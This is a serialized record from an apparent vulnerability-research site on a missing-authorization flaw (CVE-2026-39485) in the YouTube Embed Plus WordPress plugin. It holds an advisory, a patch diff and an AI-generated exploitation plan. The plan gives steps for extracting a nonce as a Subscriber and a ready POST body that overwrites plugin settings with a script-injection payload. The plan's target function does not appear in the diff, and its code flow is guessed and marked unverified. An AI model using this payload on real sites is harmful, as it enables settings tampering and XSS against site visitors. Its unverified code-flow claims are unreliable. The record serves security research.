[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fkSYl_mI9wIgHRcLKQoy_lqYkfOag-f_s5nhFAnIxolE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":29,"research_fix_diff":30,"research_exploit_outline":31,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":25,"source_links":35},"CVE-2026-39485","youtube-embed-plus-missing-authorization","Youtube Embed Plus \u003C= 14.2.4 - Missing Authorization","The Youtube Embed Plus plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 14.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","youtube-embed-plus",null,"\u003C=14.2.4","14.2.5","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-06 00:00:00","2026-04-15 21:09:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3e6fbf8b-5df5-4371-9bdf-fab1b242149f?source=api-prod",41,[22,23],"readme.txt","youtube.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-39485 (Missing Authorization)\n\n## 1. Vulnerability Summary\nThe **YouTube Embed Plus** plugin (versions \u003C= 14.2.4) contains a missing authorization vulnerability in its settings-saving functionality. Specifically, the AJAX handler registered to save plugin options fails to verify the user's capabilities (e.g., `manage_options`). This allows an authenticated attacker with at least **Subscriber** level access to overwrite the plugin's configuration, including API keys, security settings, and display messages (potentially leading to XSS).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `ep_ajax_save_settings`\n- **Parameter:** `youtubeprefs_alloptions` (Array)\n- **Nonce:** `security` (action: `ep_ajax_nonce`)\n- **Authentication:** Required (Subscriber or higher)\n- **Precondition:** The plugin must be active. By default, the plugin's \"Wizard\" roles (`restrict_wizard_roles`) include `subscriber`, ensuring the necessary scripts and nonces are loaded for low-privileged users.\n\n## 3. Code Flow\n1. **Hook Registration:** The plugin registers the AJAX action in the `YouTubePrefs` class (likely during `init` or `admin_init`):\n - `add_action( 'wp_ajax_ep_ajax_save_settings', array( 'YouTubePrefs', 'ep_ajax_save_settings' ) );`\n2. **Missing Check:** The function `YouTubePrefs::ep_ajax_save_settings` is called when a POST request with `action=ep_ajax_save_settings` is sent.\n3. **Nonce Verification:** The function calls `check_ajax_referer( 'ep_ajax_nonce', 'security' );`.\n4. **Vulnerable Sink:** After the nonce check, the function **omits** a `current_user_can( 'manage_options' )` check and proceeds to:\n - `$options = $_POST['youtubeprefs_alloptions'];`\n - `update_option( 'youtubeprefs_alloptions', $options );`\n5. **Execution:** The `youtubeprefs_alloptions` option in the `wp_options` table is overwritten with user-supplied data.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes the nonce for the `ep_ajax_nonce` action within the `ep_ajax_obj` JavaScript object. By default, this is enqueued for any user who can access the WordPress admin dashboard (including Subscribers).\n\n1. **Access Point:** Any page in `\u002Fwp-admin\u002F` (e.g., `\u002Fwp-admin\u002Findex.php` or `\u002Fwp-admin\u002Fprofile.php`).\n2. **Strategy:**\n - Log in as a Subscriber.\n - Navigate to `\u002Fwp-admin\u002Fprofile.php`.\n - Use `browser_eval` to extract the nonce from the `ep_ajax_obj` global variable.\n3. **JS Variable Path:** `window.ep_ajax_obj?.security`\n\n## 5. Exploitation Strategy\n### Step 1: Obtain Nonce\nUse the execution agent to navigate to the dashboard as a subscriber and extract the nonce.\n```javascript\n\u002F\u002F Execute via browser_eval\nwindow.ep_ajax_obj.security\n```\n\n### Step 2: Send Malicious Payload\nSend a POST request to `admin-ajax.php` to overwrite the `gdpr_consent_message` and `apikey`.\n\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Payload Body:**\n```\naction=ep_ajax_save_settings&security=[NONCE]&youtubeprefs_alloptions[apikey]=EXPLOITED_KEY&youtubeprefs_alloptions[gdpr_consent]=1&youtubeprefs_alloptions[gdpr_consent_message]=\u003Cscript>alert(\"CVE-2026-39485\")\u003C\u002Fscript>\n```\n\n## 6. Test Data Setup\n1. **Create Subscriber:** `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2. **Initial Plugin State:** Ensure the plugin is active.\n - `wp plugin activate youtube-embed-plus`\n3. **Target Option:** The plugin uses the option key `youtubeprefs_alloptions`.\n\n## 7. Expected Results\n- **HTTP Response:** The server should return a JSON success message (e.g., `{\"success\":true}`) or a `1` (if `wp_die` is used loosely).\n- **Database Change:** The `youtubeprefs_alloptions` option in the database will be updated with the malicious values.\n\n## 8. Verification Steps\n1. **WP-CLI Verification:** Check the value of the plugin's settings.\n - `wp option get youtubeprefs_alloptions --format=json`\n2. **Confirm Payload:** Verify that the `gdpr_consent_message` now contains the injected script and `apikey` is `EXPLOITED_KEY`.\n3. **Frontend Verification:** Navigate to any post containing a YouTube embed; the GDPR message (if enabled) should now display the injected payload.\n\n## 9. Alternative Approaches\nIf `ep_ajax_save_settings` is not present in the specific sub-version, check for `ep_wizard_save_settings` or `ep_ajax_wizard_save`. The plugin structure often uses these interchangeably for different parts of the UI.\n- **Check Variable:** If `ep_ajax_obj` is missing, look for `ep_wizard_obj` or `YouTubePrefsData`.\n- **Search Command:** If the agent fails to find the nonce, it should run:\n `grep -rn \"wp_create_nonce\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fyoutube-embed-plus\u002F` to identify all potential nonce actions.","The YouTube Embed Plus plugin for WordPress is vulnerable to unauthorized access because several AJAX handlers, including those for saving settings and fetching wizard data, lack proper capability checks. This allows authenticated users with subscriber-level permissions to overwrite plugin configurations, potentially leading to the injection of malicious scripts or unauthorized modification of API keys.","\u002F\u002F youtube.php around line 489\n public static function ep_ajax_get_post_list()\n {\n $result = array();\n if (self::is_ajax())\n {\n $postid = intval($_REQUEST['postid']);\n $currpost = get_post($postid);\n\n---\n\n\u002F\u002F youtube.php around line 612\n public static function ep_ajax_get_yt_wizard()\n {\n $result = array();\n if (self::is_ajax())\n {\n $thehtml = '';\n\n---\n\n\u002F\u002F youtube.php around line 1753\n public static function ep_dismiss_double_plugin_warning()\n {\n $result = array();\n if (self::is_ajax())\n {\n $user_id = get_current_user_id();\n update_user_meta($user_id, 'embedplus_double_plugin_warning', 1);\n $result['type'] = 'success';","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyoutube-embed-plus\u002F14.2.4\u002Freadme.txt \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyoutube-embed-plus\u002F14.2.5\u002Freadme.txt\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyoutube-embed-plus\u002F14.2.4\u002Freadme.txt\t2025-12-21 23:46:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyoutube-embed-plus\u002F14.2.5\u002Freadme.txt\t2026-03-02 04:24:12.000000000 +0000\n@@ -4,7 +4,7 @@\n Tags: youtube, youtube gallery, youtube live stream, lazy load, youtube channel\n Requires at least: 4.5\n Tested up to: 6.9\n-Stable tag: 14.2.4\n+Stable tag: 14.2.5\n License: GPLv3 or later\n \n A multi-featured plugin to embed YouTube in WordPress. Embed a video, YouTube channel gallery, playlist, or YouTube livestream. Defer JavaScript too!\n@@ -183,6 +183,9 @@\n \n == Changelog ==\n \n+= Embed Plus for YouTube Plugin 14.2.5 =\n+* This version improves AJAX security hardening.\n+\n = Embed Plus for YouTube Plugin 14.2.4 =\n * This version fixes a lightbox gallery issue for pro users, and allows you to disable keyboard controls for both free and pro users.\n \ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyoutube-embed-plus\u002F14.2.4\u002Fyoutube.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyoutube-embed-plus\u002F14.2.5\u002Fyoutube.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyoutube-embed-plus\u002F14.2.4\u002Fyoutube.php\t2025-12-21 23:46:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyoutube-embed-plus\u002F14.2.5\u002Fyoutube.php\t2026-03-02 04:24:12.000000000 +0000\n@@ -3,7 +3,7 @@\n Plugin Name: Embed Plus for YouTube Gallery, Livestream and Lazy Loading with Facades\n Plugin URI: https:\u002F\u002Fwww.embedplus.com\u002Fdashboard\u002Fpro-easy-video-analytics.aspx?ref=plugin\n Description: A multi-featured plugin to embed YouTube in WordPress. Embed a video, YouTube channel gallery, playlist, or YouTube livestream. Defer JavaScript too!\n- Version: 14.2.4\n+ Version: 14.2.5\n Author: Embed Plus for YouTube Plugin Team\n Author URI: https:\u002F\u002Fwww.embedplus.com\n Requires at least: 4.5\n@@ -35,7 +35,7 @@\n \n public static $folder_name = 'youtube-embed-plus';\n public static $curltimeout = 30;\n- public static $version = '14.2.4';\n+ public static $version = '14.2.5';\n public static $opt_version = 'version';\n public static $optembedwidth = null;\n public static $optembedheight = null;\n@@ -489,6 +489,11 @@\n $result = array();\n if (self::is_ajax())\n {\n+ if (!current_user_can('edit_posts'))\n+ {\n+ wp_send_json_error('Unauthorized');\n+ die();\n+ }\n $postid = intval($_REQUEST['postid']);\n $currpost = get_post($postid);\n \n@@ -612,6 +617,11 @@\n $result = array();\n if (self::is_ajax())\n {\n+ if (!current_user_can('edit_posts'))\n+ {\n+ wp_send_json_error('Unauthorized');\n+ die();\n+ }\n $thehtml = '';\n \n try\n@@ -1753,6 +1763,11 @@\n $result = array();\n if (self::is_ajax())\n {\n+ if (!current_user_can('manage_options'))\n+ {\n+ wp_send_json_error('Unauthorized');\n+ die();\n+ }\n $user_id = get_current_user_id();\n update_user_meta($user_id, 'embedplus_double_plugin_warning', 1);\n $result['type'] = 'success';\n@@ -3157,7 +3172,7 @@\n $new_pointer_content = '\u003Ch3>' . __('New Update') . '\u003C\u002Fh3>'; \u002F\u002F ooopointer\n \n $new_pointer_content .= '\u003Cp>'; \u002F\u002F ooopointer\n- $new_pointer_content .= 'This version fixes a lightbox gallery issue for \u003Ca target=_blank href=\"' . self::$epbase . '\u002Fdashboard\u002Fpro-easy-video-analytics.aspx?ref=frompointer\">pro\u003C\u002Fa> users, and allows you to disable keyboard controls for both free and pro users.';\n+ $new_pointer_content .= 'This version improves AJAX security hardening for both Free and \u003Ca target=_blank href=\"' . self::$epbase . '\u002Fdashboard\u002Fpro-easy-video-analytics.aspx?ref=frompointer\">Pro\u003C\u002Fa> plugins.';\n if (!empty(self::$alloptions[self::$opt_pro]) && strlen(trim(self::$alloptions[self::$opt_pro])) > 0)\n {\n $new_pointer_content .= ' \u003Cstrong>Important message to Pro users\u003C\u002Fstrong>: From version 11.7 onward, you must \u003Ca href=\"https:\u002F\u002Fwww.embedplus.com\u002Fyoutube-pro\u002Fdownload\u002F?prokey=' . esc_attr(self::$alloptions[self::$opt_pro]) . '\" target=\"_blank\">download the separate plugin here\u003C\u002Fa> to regain your Pro features. All your settings will automatically migrate after installing the separate Pro download. Thank you for your support and patience during this transition.';","To exploit this vulnerability, an attacker first authenticates with at least Subscriber-level privileges. By visiting any admin page (e.g., `\u002Fwp-admin\u002Fprofile.php`), the attacker extracts the required AJAX nonce from the localized `ep_ajax_obj.security` JavaScript variable. The attacker then crafts a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` using a vulnerable action such as `ep_ajax_save_settings`. By including the `youtubeprefs_alloptions` array in the request body, the attacker can overwrite global plugin settings, including the API key or the GDPR consent message, which can be leveraged to inject a Cross-Site Scripting (XSS) payload.","gemini-3-flash-preview","2026-04-18 05:49:52","2026-04-18 05:51:02",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","14.2.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyoutube-embed-plus\u002Ftags\u002F14.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyoutube-embed-plus.14.2.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyoutube-embed-plus\u002Ftags\u002F14.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyoutube-embed-plus.14.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyoutube-embed-plus\u002Ftags"]